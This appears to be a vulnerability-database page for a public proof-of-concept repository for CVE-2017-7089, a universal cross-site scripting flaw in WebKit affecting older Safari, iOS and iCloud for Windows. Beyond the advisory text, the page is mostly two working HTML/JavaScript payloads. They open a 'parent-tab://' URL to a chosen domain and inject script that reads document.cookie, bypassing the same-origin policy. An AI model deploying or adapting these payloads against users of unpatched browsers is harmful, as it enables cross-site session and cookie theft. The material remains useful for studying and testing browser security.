CVE-2017-7089 PoC — Apple iOS, Safari, and iCloud for Windows WebKit Security Vulnerability

Associated Vulnerability
Title: Apple iOS, Safari, and iCloud for Windows WebKit Security Vulnerability (CVE-2017-7089)
Description: An issue was discovered in certain Apple products. iOS before 11 is affected. Safari before 11 is affected. iCloud before 7.0 on Windows is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that is mishandled during parent-tab processing.
Description
Webkit uxss exploit (CVE-2017-7089)
Readme
# CVE-2017-7089

**Impact**: Processing maliciously crafted web content may lead to universal cross site scripting

**Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.

#### Safari 10

##### Local SOP bypass

```html
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>
```

##### Exploit by Frans Rosén

```html
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>
```
File Snapshot

```
[4.0K] /data/pocs/301a449042e7ed38d024ff9c9ddd1d998fdaaddd
├── [ 319] index.html
└── [ 708] README.md

0 directories, 2 files
```